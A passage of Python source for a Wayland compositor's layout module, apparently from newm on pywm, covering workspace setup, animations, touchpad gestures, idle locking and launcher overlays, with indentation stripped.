con_thr.start()
# Now, pipe a bunch of data into the queue
for i in range(100):
in_q.put(i)
in_q.put(StopIteration)
layout.py
from __future__ import annotations
from typing import Optional, Callable, TYPE_CHECKING, TypeVar, Union, Any, cast
import time
import math
import logging
import subprocess
import os
from itertools import product
from threading import Thread
from pywm import (
PyWM,
PyWMOutput,
PyWMDownstreamState,
PYWM_MOD_CTRL,
PYWM_PRESSED,
PYWM_MOD_ALT,
PYWM_MOD_LOGO
)
from pywm.touchpad import (
TwoFingerSwipePinchGesture,
HigherSwipeGesture,
SingleFingerMoveGesture
)
from pywm.touchpad.gestures import Gesture
from .state import LayoutState, WorkspaceState
from .interpolation import LayoutDownstreamInterpolation
from .animate import Animate
from .view import View
from .config import configured_value, load_config, print_config
from .key_processor import KeyProcessor
from .panel_endpoint import PanelEndpoint
from .panel_launcher import PanelsLauncher
from .sys_backend import SysBackend, SysBackendEndpoint
from .auth_backend import AuthBackend
from .widget import (
TopBar,
BottomBar,
Background,
Corner
)
from .overlay import (
Overlay,
MoveResizeOverlay,
MoveResizeFloatingOverlay,
SwipeOverlay,
SwipeToZoomOverlay,
LauncherOverlay,
)
logger = logging.getLogger(__name__)
conf_mod = configured_value('mod', PYWM_MOD_LOGO)
conf_pywm = configured_value('pywm', cast(dict[str, Any], {}))
conf_outputs = configured_value('outputs', cast(list[dict[str, Any]], []))
conf_send_fullscreen_to_views = configured_value('view.send_fullscreen', True)
if TYPE_CHECKING:
TKeyBindings = Callable[[Layout], list[tuple[str, Callable[[], None]]]]
else:
TKeyBindings = TypeVar('TKeyBindings')
conf_key_bindings = configured_value('key_bindings', cast(TKeyBindings, lambda layout: []))
conf_sys_backend_endpoints = configured_value('sys_backend_endpoints', cast(list[SysBackendEndpoint], []))
conf_lp_freq = configured_value('gestures.lp_freq', 60.)
conf_lp_inertia = configured_value('gestures.lp_inertia', .8)
conf_two_finger_min_dist = configured_value('gestures.two_finger_min_dist', .1)
conf_validate_threshold = configured_value('gestures.validate_threshold', .02)
conf_anim_t = configured_value('anim_time', .3)
conf_blend_t = configured_value('blend_time', 1.)
conf_power_times = configured_value('power_times', [120, 300, 600])
conf_suspend_command = configured_value('suspend_command', "systemctl suspend")
conf_on_startup = configured_value('on_startup', lambda: None)
conf_on_reconfigure = configured_value('on_reconfigure', lambda: None)
conf_lock_on_wakeup = configured_value('lock_on_wakeup', True)
conf_bar_enabled = configured_value('bar.enabled', True)
def _score(i1: float, j1: float, w1: float, h1: float,
im: int, jm: int,
i2: float, j2: float, w2: float, h2: float) -> float:
if (i1, j1, w1, h1) == (i2, j2, w2, h2):
return 1000
if im < 0:
im *= -1
i1 *= -1
i2 *= -1
i1 -= w1
i2 -= w2
if jm < 0:
jm *= -1
j1 *= -1
j2 *= -1
j1 -= h1
j2 -= h2
if jm == 1 and im == 0:
im, jm = jm, im
i1, j1, w1, h1 = j1, i1, h1, w1
i2, j2, w2, h2 = j2, i2, h2, w2
"""
At this point: im == 1, jm == 0
"""
d_i = i2 - (i1 + w1)
if d_i < 0:
return 1000
d_j = 0.
if j2 >= j1 + h1:
d_j = j2 - (j1 + h1)
elif j1 >= j2 + h2:
d_j = j1 - (j2 + h2)
else:
d_j = -1
return d_i + d_j
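# Worked example (illustrative): with movement direction (im, jm) = (1, 0), a
# unit box at (1, 0) seen from a unit box at (0, 0) overlaps vertically and
# touches horizontally, so _score(0, 0, 1, 1, 1, 0, 1, 0, 1, 1) == -1, while
# any box starting behind the origin box (d_i < 0) scores 1000.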
class Animation:
def __init__(self,
layout: Layout,
reducer: Callable[[LayoutState], tuple[Optional[LayoutState], Optional[LayoutState]]],
duration: float, then: Optional[Callable[..., None]], overlay_safe: bool=False) -> None:
super().__init__()
self.layout = layout
"""
(current state) -> (animation initial state (possibly None), animation final state)
"""
self.reducer = reducer
self._initial_state: Optional[LayoutState] = None
self._final_state: Optional[LayoutState] = None
self._started: Optional[float] = None
        # Prevent division by zero
self.duration = max(.1, duration)
self.then = then
self.overlay_safe = overlay_safe
def check_finished(self) -> bool:
if self._started is not None and self._final_state is None:
return True
if self._started is not None and time.time() > self._started + self.duration:
if self._final_state is not None:
self.layout.update(self._final_state)
if callable(self.then):
self.then()
return True
return False
def start(self) -> None:
try:
self._initial_state, self._final_state = self.reducer(self.layout.state)
except:
logger.exception("During animation reducer")
self._initial_state, self._final_state = None, None
if self._initial_state is not None:
self.layout.update(self._initial_state)
self._started = time.time()
if self._final_state is not None:
# Enforce constraints on final state
self._final_state.constrain()
self._final_state.validate_fullscreen()
self._final_state.validate_stack_indices()
self.layout._animate_to(self._final_state, self.duration)
else:
logger.debug("Animation decided not to take place anymore")
def __str__(self) -> str:
return "%s -> %s (%f%s)" % (self._initial_state, self._final_state, self.duration, ", then" if self.then is not None else "")
class LayoutThread(Thread):
def __init__(self, layout: Layout) -> None:
super().__init__()
self.layout = layout
"""
Overlay or Animation
"""
self._pending: list[Any] = []
self._current_ovr: Optional[Overlay] = None
self._current_anim: Optional[Animation] = None
self._running = True
def stop(self) -> None:
self._running = False
def push(self, nxt: Union[Overlay, Animation]) -> None:
if isinstance(nxt, Overlay):
if self._current_ovr is not None or len([x for x in self._pending if isinstance(x, Overlay)]) > 0:
logger.debug("Rejecting queued overlay")
return
else:
logger.debug("Queuing overlay")
self._pending += [nxt]
else:
if nxt.overlay_safe:
logger.debug("Overlay-safe animation not queued")
self._pending = [nxt] + self._pending
else:
logger.debug("Queuing animation")
self._pending += [nxt]
def on_overlay_destroyed(self) -> None:
logger.debug("Thread: Finishing overlay...")
self._current_ovr = None
def run(self) -> None:
while self._running:
try:
if len(self._pending) > 0:
if isinstance(self._pending[0], Overlay):
if self._current_anim is None and self._current_ovr is None:
logger.debug("Thread: Starting overlay...")
self._current_ovr = self._pending.pop(0)
self.layout.start_overlay(self._current_ovr)
else:
if self._current_anim is None and (self._current_ovr is None or self._pending[0].overlay_safe):
logger.debug("Thread: Starting animation...")
self._current_anim = self._pending.pop(0)
self._current_anim.start()
if self._current_anim is not None:
if self._current_anim.check_finished():
logger.debug("Thread: Finishing animation...")
self._current_anim = None
except Exception:
logger.exception("Unexpected during LayoutThread")
time.sleep(1. / 120.)
class Workspace:
def __init__(self, output: PyWMOutput, pos_x: int, pos_y: int, width: int, height: int, prevent_anim: bool=False) -> None:
self._handle = -1
self.outputs = [output]
self.pos_x = pos_x
self.pos_y = pos_y
self.width = width
self.height = height
self.prevent_anim = prevent_anim
# Hint at view._handle to focus when switching to this workspace (not guaranteed to exist anymore)
self.focus_view_hint: Optional[int] = None
def swallow(self, other: Workspace) -> bool:
if self.pos_x + self.width <= other.pos_x:
return False
if self.pos_y + self.height <= other.pos_y:
return False
if self.pos_x >= other.pos_x + other.width:
return False
if self.pos_y >= other.pos_y + other.height:
return False
pos_x = min(self.pos_x, other.pos_x)
pos_y = min(self.pos_y, other.pos_y)
width = max(self.pos_x + self.width, other.pos_x + other.width) - pos_x
height = max(self.pos_y + self.height, other.pos_y + other.height) - pos_y
self.pos_x = pos_x
self.pos_y = pos_y
self.width = width
self.height = height
self.outputs += other.outputs
self.prevent_anim |= other.prevent_anim
return True
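    # Example (illustrative): a 1920x1080 workspace at (0, 0) overlapping a
    # 1280x720 workspace at (1800, 0) swallows it and grows to the bounding box
    # 3080x1080 at (0, 0); a workspace starting at x >= 1920 does not overlap,
    # so swallow() returns False and both workspaces are kept.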
def score(self, other: Workspace) -> float:
x, y, w, h = self.pos_x, self.pos_y, self.width, self.height
if other.pos_x > x:
w -= (other.pos_x - x)
x += (other.pos_x - x)
if other.pos_y > y:
h -= (other.pos_y - y)
y += (other.pos_y - y)
if x + w > other.pos_x + other.width:
w -= (x + w - other.pos_x - other.width)
if y + h > other.pos_y + other.height:
h -= (y + h - other.pos_y - other.height)
if w <= 0 or h <= 0:
return 0
return w*h / (self.width * self.height)
def __str__(self) -> str:
return "Workspace[%d] at %d, %d --> %d, %d" % (
self._handle,
self.pos_x,
self.pos_y,
self.width,
self.height,
)
class Layout(PyWM[View], Animate[PyWMDownstreamState]):
def __init__(self, debug: bool=False) -> None:
load_config()
self._debug = debug
PyWM.__init__(self, View, **conf_pywm(), outputs=conf_outputs(), debug=debug)
Animate.__init__(self)
self.mod = conf_mod()
self.mod_sym = ""
self._set_mod_sym()
self.key_processor = KeyProcessor(self.mod_sym)
self.sys_backend = SysBackend(self)
self.auth_backend = AuthBackend(self)
self.panel_launcher = PanelsLauncher()
self.panel_endpoint = PanelEndpoint(self)
self.workspaces: list[Workspace] = [Workspace(PyWMOutput("dummy", -1, 1., 1280, 720, (0, 0)), 0, 0, 1280, 720)]
self.state = LayoutState()
self.overlay: Optional[Overlay] = None
self.backgrounds: list[Background] = []
self.top_bars: list[TopBar] = []
self.bottom_bars: list[BottomBar] = []
self.corners: list[list[Corner]] = []
self.thread = LayoutThread(self)
self._animations: list[Animation] = []
self._idle_inhibit_user = False
        # (Workspace the cursor is on, optional override set by the most recently focused view)
self._active_workspace: tuple[Workspace, Optional[Workspace]] = self.workspaces[0], None
def _set_mod_sym(self) -> None:
self.mod_sym = ""
if self.mod == PYWM_MOD_ALT:
self.mod_sym = "Alt"
elif self.mod == PYWM_MOD_LOGO:
self.mod_sym = "Super"
else:
raise Exception("Unknown mod")
def _setup_workspaces(self) -> None:
output_conf = conf_outputs()
def disable_anim(output: PyWMOutput) -> bool:
for o in output_conf:
if o['name'] == output.name:
return 'anim' in o and not o['anim']
return False
ws = [Workspace(o, o.pos[0], o.pos[1], o.width, o.height, disable_anim(o)) for o in self.layout]
i, j = 0, len(ws) - 1
while i < len(ws) and j < len(ws) and i < j:
if ws[i].swallow(ws[j]):
del ws[j]
else:
if j == i + 1:
j = len(ws) - 1
i += 1
else:
j -= 1
for w in self.workspaces:
best_score = 0.1
best_ws = None
for wp in ws:
if wp._handle >= 0:
continue
score = w.score(wp)
if score > best_score:
best_score = score
best_ws = wp
if best_ws is not None:
best_ws._handle = w._handle
self.workspaces = ws
for w in [w for w in self.workspaces if w._handle < 0]:
h = 0
while True:
if h not in [w._handle for w in self.workspaces]:
break
h+=1
w._handle = h
logger.debug("Setup of newm workspaces")
for w in self.workspaces:
logger.debug(" %s" % str(w))
self.state = self.state.with_workspaces(self)
self._update_active_workspace()
def _update_active_workspace(self) -> None:
# Clean
ws_check1, ws_check2 = self._active_workspace
if ws_check1._handle not in [w._handle for w in self.workspaces]:
ws_check1 = self.workspaces[0]
if ws_check2 is not None and ws_check2._handle not in [w._handle for w in self.workspaces]:
ws_check2 = None
self._active_workspace = ws_check1, ws_check2
# Find ws cursor is on
ws: Optional[Workspace] = None
for w in self.workspaces:
if w.pos_x <= self.cursor_pos[0] < w.pos_x + w.width and w.pos_y <= self.cursor_pos[1] < w.pos_y + w.height:
ws = w
break
# Possibly update ws after cursor move
if ws is None:
logger.warn("Workspaces do not cover whole area")
else:
ws_old, _ = self._active_workspace
if ws_old != ws:
self._active_workspace = ws, None
def _setup_widgets(self) -> None:
def get_workspace_for_output(output: PyWMOutput) -> Workspace:
for w in self.workspaces:
if w.pos_x <= output.pos[0] < w.pos_x + w.width and w.pos_y <= output.pos[1] < w.pos_y + w.height:
return w
logger.warn("Workspaces do not cover whole area")
return self.workspaces[0]
for b in self.bottom_bars:
b.stop()
b.destroy()
self.bottom_bars = []
for t in self.top_bars:
t.stop()
t.destroy()
self.top_bars = []
for bg in self.backgrounds:
bg.destroy()
self.backgrounds = []
for c in self.corners:
for c2 in c:
c2.destroy()
self.corners = []
if conf_bar_enabled():
self.bottom_bars = [self.create_widget(BottomBar, o) for o in self.layout]
self.top_bars = [self.create_widget(TopBar, o) for o in self.layout]
else:
self.bottom_bars = []
self.top_bars = []
self.backgrounds = [self.create_widget(Background, o, get_workspace_for_output(o)) for o in self.layout]
for o in self.layout:
self.corners += [[
self.create_widget(Corner, o, True, True),
self.create_widget(Corner, o, True, False),
self.create_widget(Corner, o, False, True),
self.create_widget(Corner, o, False, False)
]]
self.damage()
def _setup(self, fallback: bool=True, reconfigure: bool=True) -> None:
if reconfigure:
load_config(fallback=fallback)
self.mod = conf_mod()
self._set_mod_sym()
self.configure_gestures(
conf_two_finger_min_dist(),
conf_lp_freq(),
conf_lp_inertia(),
conf_validate_threshold())
self._setup_widgets()
self.key_processor.clear()
if (kb := conf_key_bindings()) is not None:
self.key_processor.register_bindings(
*kb(self)
)
self.sys_backend.set_endpoints(
*conf_sys_backend_endpoints()
)
self.sys_backend.register_xf86_keybindings()
if reconfigure:
self.reconfigure(dict(**conf_pywm(), outputs=conf_outputs(), debug=self._debug))
def reducer(self, state: LayoutState) -> PyWMDownstreamState:
return PyWMDownstreamState(state.lock_perc)
def animate(self, old_state: LayoutState, new_state: LayoutState, dt: float) -> None:
cur = self.reducer(old_state)
nxt = self.reducer(new_state)
self._animate(LayoutDownstreamInterpolation(self, cur, nxt), dt)
def process(self) -> PyWMDownstreamState:
return self._process(self.reducer(self.state))
def main(self) -> None:
logger.debug("Layout main...")
self._setup(reconfigure=False)
self.thread.start()
self.panel_endpoint.start()
self.panel_launcher.start()
# Initially display cursor
self.update_cursor()
# Run on_startup
try:
conf_on_startup()()
except Exception:
logger.exception("on_startup")
# Fade in
def fade_in() -> None:
time.sleep(.5)
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
return None, state.copy(background_opacity=1.)
self.animate_to(reducer, conf_blend_t())
Thread(target=fade_in).start()
# Greeter
if self.auth_backend.is_greeter():
def greet() -> None:
while len([p for p in self.panels() if p.panel == "lock"]) < 1:
time.sleep(.5)
self.ensure_locked()
self.auth_backend.init_session()
Thread(target=greet).start()
def _terminate(self) -> None:
super().terminate()
self.panel_endpoint.stop()
self.panel_launcher.stop()
for t in self.top_bars:
t.stop()
for b in self.bottom_bars:
b.stop()
if self.sys_backend is not None:
self.sys_backend.stop()
if self.thread is not None:
self.thread.stop()
def animate_to(self,
reducer: Callable[[LayoutState], tuple[Optional[LayoutState], Optional[LayoutState]]],
duration: float,
then: Optional[Callable[..., None]]=None,
overlay_safe: bool=False) -> None:
self.thread.push(Animation(self, reducer, duration, then, overlay_safe))
def damage(self) -> None:
super().damage()
for _, v in self._views.items():
v.damage()
for bg in self.backgrounds:
bg.damage()
for t in self.top_bars:
t.damage()
for b in self.bottom_bars:
b.damage()
def update(self, new_state: LayoutState) -> None:
self.state = new_state
self.damage()
def _animate_to(self, new_state: LayoutState, duration: float) -> None:
self.animate(self.state, new_state, duration)
for _, v in self._views.items():
v.animate(self.state, new_state, duration)
for bg in self.backgrounds:
bg.animate(self.state, new_state, duration)
for t in self.top_bars:
t.animate(self.state, new_state, duration)
for b in self.bottom_bars:
b.animate(self.state, new_state, duration)
def _trusted_unlock(self) -> None:
if self.is_locked():
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
return None, state.copy(lock_perc=0., background_opacity=1.)
self.animate_to(
reducer,
conf_anim_t(),
lambda: self.update_cursor())
"""
Utilities
"""
def __str__(self) -> str:
return "<Layout %s>" % (self.config)
def debug_str(self) -> str:
res = "%s\n %s\n\n" % (self, str(self.state))
for w in self.workspaces:
res += "%s\n %s\n" % (str(w), self.state.get_workspace_state(w))
for i, v in self._views.items():
s = None
ws_handle = -1
try:
s, ws_state, ws_handle = self.state.find_view(v)
except:
pass
res += "%2d: %s on workspace %d\n %s\n" % (i, v, ws_handle, s)
return res
def find_focused_box(self) -> tuple[Workspace, float, float, float, float]:
try:
view = self.find_focused_view()
if view is not None:
view_state, ws_state, ws_handle = self.state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
return ws, view_state.i, view_state.j, view_state.w, view_state.h
        except Exception:
            pass
        return self.workspaces[0], 0, 0, 1, 1
def place_initial(self, workspace: Workspace, ws_state: WorkspaceState, w: int, h: int) -> tuple[int, int]:
"""
Strategy
- If viewpoint > extent:
- If first view: Place at 0, 0
- Otherwise: Enlarge to the top right (if space) or bottom left
- Else
- Start at top right visible tile and move to right (alternatively traverse in spiral) to find closest unused tile
"""
place_i = 0
place_j = 0
min_i, min_j, max_i, max_j = ws_state.get_extent()
min_i = math.floor(min_i)
min_j = math.floor(min_j)
max_i = math.floor(max_i)
max_j = math.floor(max_j)
view_min_i, view_min_j = ws_state.i, ws_state.j
view_max_i, view_max_j = ws_state.i + ws_state.size - 1, ws_state.j + ws_state.size - 1
view_min_i = math.floor(view_min_i)
view_min_j = math.floor(view_min_j)
view_max_i = math.ceil(view_max_i)
view_max_j = math.ceil(view_max_j)
if len(self.tiles(workspace)) == 0:
place_i, place_j = 0, 0
elif (view_max_i - view_min_i) > (max_i - min_i):
place_i, place_j = max_i + 1, max(min_j, view_min_j)
elif (view_max_j - view_min_j) > (max_j - min_j):
place_i, place_j = max(min_i, view_min_i), max_j + 1
else:
i, j = ws_state.i, ws_state.j
for j, i in product(range(math.floor(j),
math.ceil(j + ws_state.size)),
range(math.floor(i),
math.ceil(i + ws_state.size))):
for jp, ip in product(range(j, j + h), range(i, i + w)):
if not ws_state.is_tile_free(ip, jp):
break
else:
place_i, place_j = i, j
break
else:
ws_, i_, j_, w_, h_ = self.find_focused_box()
if ws_._handle != workspace._handle:
i_, j_, w_, h_ = 0, 0, 1, 1
place_i, place_j = round(i_ + w_), round(j_)
while not ws_state.is_tile_free(place_i, place_j):
place_i += 1
logger.debug("Found initial placement at %d, %d", place_i, place_j)
return place_i, place_j
def on_layout_change(self) -> None:
self._setup_workspaces()
self._setup_widgets()
def on_key(self, time_msec: int, keycode: int, state: int, keysyms: str) -> bool:
# BEGIN DEBUG
if self.modifiers & self.mod > 0 and keysyms == "D":
self.force_close_overlay()
return True
# END DEBUG
if self.overlay is not None and self.overlay.ready():
logger.debug("...passing to overlay %s", self.overlay)
if self.overlay.on_key(time_msec, keycode, state, keysyms):
return True
return self.key_processor.on_key(state == PYWM_PRESSED,
keysyms,
self.modifiers,
self.mod,
self.is_locked())
def on_modifiers(self, modifiers: int) -> bool:
if self.is_locked():
return False
if self.modifiers & self.mod > 0:
"""
This is a special case, if a SingleFingerMoveGesture has started, then
Mod is pressed the MoveResize(Floating)Overlay is not triggered - we reallow a
gesture
If a gesture has been captured reallow_gesture is a noop
"""
logger.debug("Resetting gesture")
self.reallow_gesture()
if self.overlay is not None and self.overlay.ready():
if self.overlay.on_modifiers(modifiers):
return True
return False
def on_motion(self, time_msec: int, delta_x: float, delta_y: float) -> bool:
self._update_active_workspace()
if self.is_locked():
return False
if self.overlay is not None and self.overlay.ready():
return self.overlay.on_motion(time_msec, delta_x, delta_y)
return False
def on_button(self, time_msec: int, button: int, state: int) -> bool:
if self.is_locked():
return False
if self.overlay is not None and self.overlay.ready():
return self.overlay.on_button(time_msec, button, state)
return False
def on_axis(self, time_msec: int, source: int, orientation: int, delta: float, delta_discrete: int) -> bool:
if self.is_locked():
return False
if self.overlay is not None and self.overlay.ready():
return self.overlay.on_axis(time_msec, source, orientation,
delta, delta_discrete)
return False
def on_gesture(self, gesture: Gesture) -> bool:
if self.is_locked():
return False
logger.debug("Gesture %s...", gesture)
if self.overlay is not None and self.overlay.ready():
logger.debug("...passing to overlay %s", self.overlay)
return self.overlay.on_gesture(gesture)
elif self.overlay is None:
if self.modifiers & self.mod and \
(isinstance(gesture, TwoFingerSwipePinchGesture) or
isinstance(gesture, SingleFingerMoveGesture)):
logger.debug("...MoveResize")
view = self.find_focused_view()
ovr: Optional[Overlay] = None
if view is not None and view.is_float(self.state):
ovr = MoveResizeFloatingOverlay(self, view)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
elif view is not None and view.is_tiled(self.state):
ovr = MoveResizeOverlay(self, view)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
if isinstance(gesture, HigherSwipeGesture) \
and gesture.n_touches == 3:
logger.debug("...Swipe")
ovr = SwipeOverlay(self)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
if not self.state.get_workspace_state(self.get_active_workspace()).is_in_overview():
if isinstance(gesture, HigherSwipeGesture) \
and gesture.n_touches == 4:
logger.debug("...SwipeToZoom")
ovr = SwipeToZoomOverlay(self)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
if isinstance(gesture, HigherSwipeGesture) \
and gesture.n_touches == 5:
logger.debug("...Launcher")
ovr = LauncherOverlay(self)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
return False
def on_idle(self, elapsed: float, idle_inhibited: bool) -> None:
idle_inhibited = idle_inhibited or self._idle_inhibit_user
if idle_inhibited and elapsed > 0:
return
if elapsed == 0:
self.sys_backend.idle_state(0)
elif len(conf_power_times()) > 2 and elapsed > conf_power_times()[2]:
os.system(conf_suspend_command())
elif len(conf_power_times()) > 1 and elapsed > conf_power_times()[1]:
self.sys_backend.idle_state(2)
self.ensure_locked()
elif len(conf_power_times()) > 0 and elapsed > conf_power_times()[0]:
self.sys_backend.idle_state(1)
def on_wakeup(self) -> None:
if conf_lock_on_wakeup():
self.ensure_locked()
def enter_overlay(self, overlay: Overlay) -> None:
self.thread.push(overlay)
def start_overlay(self, overlay: Overlay) -> None:
logger.debug("Going to enter %s...", overlay)
self.key_processor.on_other_action()
self.overlay = overlay
self.overlay.init()
# BEGIN DEBUG
def force_close_overlay(self) -> None:
if self.overlay is None:
return
logger.debug("Force-closing %s", self.overlay)
try:
self.overlay.destroy()
finally:
self.overlay = None
# END DEBUG
def exit_overlay(self) -> None:
logger.debug("Going to exit overlay...")
if self.overlay is None:
logger.debug("...aborted")
return
logger.debug("...destroy")
self.overlay.destroy()
def on_overlay_destroyed(self) -> None:
logger.debug("Overlay destroyed")
self.thread.on_overlay_destroyed()
self.overlay = None
logger.debug("Resetting gesture")
self.reallow_gesture()
def destroy_view(self, view: View) -> None:
logger.info("Destroying view %s", view)
state = None
ws_state = None
try:
state, ws_state, ws_handle = self.state.find_view(view)
except:
"""
This can happen if the view has not been mapped (view.show) when it is destroyed
"""
return
best_view: Optional[int] = None
if view.is_focused():
logger.debug("Finding view to focus since %s closes...", view)
if view.parent is not None:
p = cast(View, view.parent)
while not p.is_tiled(self.state) and p.parent is not None:
p = cast(View, p.parent)
if p is not None:
best_view = p._handle
if best_view is None:
best_view_score = 1000.
for k, s in ws_state._view_states.items():
if not s.is_tiled:
continue
if k == view._handle:
continue
i, j, w, h = state.i, state.j, state.w, state.h
if state.is_layer:
i, j = ws_state.i + .5*ws_state.size, ws_state.j + .5*ws_state.size
w, h = 0, 0
elif not state.is_tiled:
i, j = state.float_pos
w, h = 0, 0
sc = (s.i - i + s.w / 2. - w / 2.)**2 + (s.j - j + s.h / 2. - h / 2.)**2
logger.debug("View (%d) has score %f", k, sc)
if sc < best_view_score:
best_view_score = sc
best_view = k
if best_view is not None and best_view in self._views:
logger.debug("Found view to focus: %s" % self._views[best_view])
bv: int = best_view
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
try:
self._views[bv].focus()
state = state\
.focusing_view(self._views[bv])\
.without_view_state(view)\
.constrain()
except:
"""
View might not exist anymore
"""
state = state\
.copy()\
.without_view_state(view)\
.constrain()
return None, state
self.animate_to(
reducer,
conf_anim_t())
else:
logger.debug("Not focusing a view")
self.animate_to(
lambda state: (None, state
.copy()
.without_view_state(view)
.constrain()),
conf_anim_t())
def focus_hint(self, view: View) -> None:
try:
_, __, ws_handle = self.state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
ws.focus_view_hint = view._handle
ws_a, ws_a_old = self._active_workspace
self._active_workspace = ws_a, ws
except Exception:
logger.warn("Missing state: %s" % self)
def command(self, cmd: str, arg: Optional[str]=None) -> Optional[str]:
logger.debug(f"Received command {cmd}")
def set_inhibit_idle(status: bool) -> None:
self._idle_inhibit_user = status
def lock() -> None:
self._update_idle(True)
self.ensure_locked(anim=False)
def clean() -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
new_state = state.copy().clean(list(self._views.keys()))
return None, new_state
self.animate_to(reducer, conf_anim_t())
cmds: dict[str, Callable[[], Optional[str]]] = {
"lock": self.ensure_locked,
"lock-pre": lambda: self.ensure_locked(anim=False),
"lock-post": lock,
"config": print_config,
"debug": self.debug_str,
"inhibit-idle": lambda: set_inhibit_idle(True),
"finish-inhibit-idle": lambda: set_inhibit_idle(False),
"close-launcher": lambda: self.exit_overlay() if isinstance(self.overlay, LauncherOverlay) else None,
"open-virtual-output": lambda: self.open_virtual_output(arg) if arg is not None else None,
"close-virtual-output": lambda: self.close_virtual_output(arg) if arg is not None else None,
"clean": clean
}
return cmds.get(cmd, lambda: f"Unknown command {cmd}")()
def launch_app(self, cmd: str) -> None:
"""
Should be LauncherOverlay
"""
self.exit_overlay()
os.system("%s &" % cmd)
def is_view_on_workspace(self, view: View, workspace: Optional[Workspace]) -> bool:
if workspace is None:
return True
try:
_, __, ws_handle = self.state.find_view(view)
return workspace._handle == ws_handle
except Exception:
logger.warn("Missing state: %s" % self)
return False
"""
API to be used for configuration
1. Getters
"""
def get_active_workspace(self) -> Workspace:
if self._active_workspace[1] is not None:
return self._active_workspace[1]
return self._active_workspace[0]
def tiles(self, workspace: Optional[Workspace]=None) -> list[View]:
return [v for _, v in self._views.items() if v.is_tiled(self.state) and self.is_view_on_workspace(v, workspace)]
def floats(self, workspace: Optional[Workspace]=None) -> list[View]:
return [v for _, v in self._views.items() if v.is_float(self.state) and self.is_view_on_workspace(v, workspace)]
def panels(self, workspace: Optional[Workspace]=None) -> list[View]:
return [v for _, v in self._views.items() if v.is_panel() and self.is_view_on_workspace(v, workspace)]
def views(self, workspace: Optional[Workspace]=None) -> list[View]:
return [v for _, v in self._views.items() if not v.is_panel() and self.is_view_on_workspace(v, workspace)]
def find_focused_view(self) -> Optional[View]:
for _, view in self._views.items():
if view.is_focused():
return view
return None
"""
2. General purpose methods
"""
def update_config(self) -> None:
self._setup(fallback=False)
self.damage()
conf_on_reconfigure()()
def ensure_locked(self, anim: bool=True, dim: bool=False) -> None:
def focus_lock() -> None:
lock_screen = [v for v in self.panels() if v.panel == "lock"]
if len(lock_screen) > 0:
lock_screen[0].focus()
else:
logger.exception("Locking without lock panel - not a good idea")
self.auth_backend.lock()
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
return None if anim else state.copy(lock_perc=1., background_opacity=.5), state.copy(lock_perc=1., background_opacity=.5)
self.animate_to(
reducer,
conf_anim_t(), focus_lock)
if dim:
self.sys_backend.idle_state(1)
def terminate(self) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
return state.copy(final=True), state.copy(final=True, background_opacity=0.)
self.animate_to(reducer, conf_blend_t(), self._terminate)
"""
3. Change global or workspace state / move viewpoint
"""
def enter_launcher_overlay(self) -> None:
self.enter_overlay(LauncherOverlay(self))
def toggle_overview(self, only_active_workspace: bool=False) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
if only_active_workspace:
overview = not state.get_workspace_state(self.get_active_workspace()).is_in_overview()
else:
overview = not state.all_in_overview()
focused: Optional[View] = None
if not overview:
focused = self.find_focused_view()
return None, state.with_overview_set(overview, None if not only_active_workspace else self.get_active_workspace(), focused)
self.animate_to(reducer, conf_anim_t())
def toggle_fullscreen(self, defined_state: Optional[bool] = None) -> None:
active_ws = self.get_active_workspace()
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
if state.get_workspace_state(self.get_active_workspace()).is_in_overview():
state = state.with_overview_set(False, only_workspace=self.get_active_workspace())
view = self.find_focused_view()
if view is not None and not view.is_tiled(state):
view = None
if view is not None:
while view.parent is not None and not view.is_tiled(state):
view = cast(View, view.parent)
ws: Optional[Workspace] = None
ws_state: Optional[WorkspaceState] = None
if view is not None:
view_state, ws_state, ws_handle = state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
else:
ws = active_ws
ws_state = state.get_workspace_state(active_ws)
fs = ws_state.is_fullscreen()
if fs == defined_state:
return None, None
if conf_send_fullscreen_to_views():
for v in self.tiles():
v.set_fullscreen(not fs)
if fs:
return None, state.setting_workspace_state(ws, ws_state.without_fullscreen())
elif view is not None:
return None, state.setting_workspace_state(ws, ws_state.with_fullscreen(view))
else:
return None, None
self.animate_to(reducer, conf_anim_t())
def basic_move(self, delta_i: int, delta_j: int) -> None:
ws = self.get_active_workspace()
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
ws_state = state.get_workspace_state(ws)
return None, state.replacing_workspace_state(ws, i=ws_state.i+delta_i, j=ws_state.j+delta_j)
self.animate_to(reducer, conf_anim_t())
def basic_scale(self, delta_s: int) -> None:
ws = self.get_active_workspace()
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
ws_state = state.get_workspace_state(ws)
return None, state.replacing_workspace_state(ws, size=max(1, ws_state.size+delta_s))
self.animate_to(reducer, conf_anim_t())
"""
4. Change focus
"""
def focus_view(self, view: View) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
view.focus()
return None, state.focusing_view(view)
self.animate_to(reducer, conf_anim_t())
def move_in_stack(self, delta: int) -> None:
view = self.find_focused_view()
if view is None:
return
try:
view_state, ws_state, ws_handle = self.state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
sid, idx, siz = view_state.stack_data
nidx = (idx+1)%siz
next_view = [k for k, s in ws_state._view_states.items() if s.stack_data[0] == sid and s.stack_data[1]==nidx]
if len(next_view) > 0 and next_view[0] != view:
self._views[next_view[0]].focus()
except:
logger.exception("Unexpected")
def move(self, delta_i: int, delta_j: int) -> None:
ws, i, j, w, h = self.find_focused_box()
ws_state = self.state.get_workspace_state(ws)
